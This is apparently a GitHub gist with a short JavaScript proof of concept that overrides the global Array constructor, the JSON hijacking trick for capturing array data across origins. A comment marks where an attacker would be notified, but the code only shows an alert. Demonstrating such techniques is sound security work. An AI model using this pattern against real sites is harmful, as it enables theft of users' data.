Skip to content

Instantly share code, notes, and snippets.

@afshinm
Created February 11, 2013 16:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save afshinm/4755394 to your computer and use it in GitHub Desktop.
Save afshinm/4755394 to your computer and use it in GitHub Desktop.
function Array() {
var foo = this;
var bar = function() {
var ret = "Captured array items are: ";
//notify an attacker. Here we just display it
alert(ret);
};
setTimeout(bar, 100);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment